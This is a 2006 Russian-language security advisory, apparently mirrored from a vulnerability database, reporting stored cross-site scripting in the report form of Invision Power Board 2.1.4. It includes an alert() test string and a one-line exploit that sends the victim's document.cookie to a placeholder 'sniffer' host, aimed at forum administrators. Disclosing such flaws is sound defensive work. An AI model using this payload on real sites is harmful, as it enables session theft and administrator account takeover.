Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11661
HistoryMar 02, 2006 - 12:00 a.m.

Active XSS in Invision Power Board 2.1.4

2006-03-0200:00:00
vulners.com
25

Здравствуйте. Очередная уязвимость найденна командой Cyber
Lords(www.cyberlords.net). На этот раз в продукте Invision Power Board.
Я бы посоветовал вам опубликовать данную уязвимость в отдельную новость.


Advisory: Active XSS in Invision Power Board 2.1.4

Уязвимость/Vulnerability:
Межсайтовый скриптинг/Cross Site Scripting

Нет фильтрации входящих данных. Возможно проведение атаки межсайтовый
скриптинг,
отослав в форме жалобы на сообщение запрос вида:
"<script>alert()</script>".
С помощью данной атаки возможна утечка конфиденциальных данных
пользователя на сторонний сервер.
Форма находится по адресу
http://forum/index.php?act=report&amp;t=123&amp;p=123&amp;st=0

Exploit:

<script>img = new Image(); img.src =
"http://sniffer/file.php?&quot;+document.cookie;&lt;/script&gt;

P.S. Далее у всей администрации форума, автоматически появится
уведомление о жалобе.

Cyber Lords
www.cyberlords.net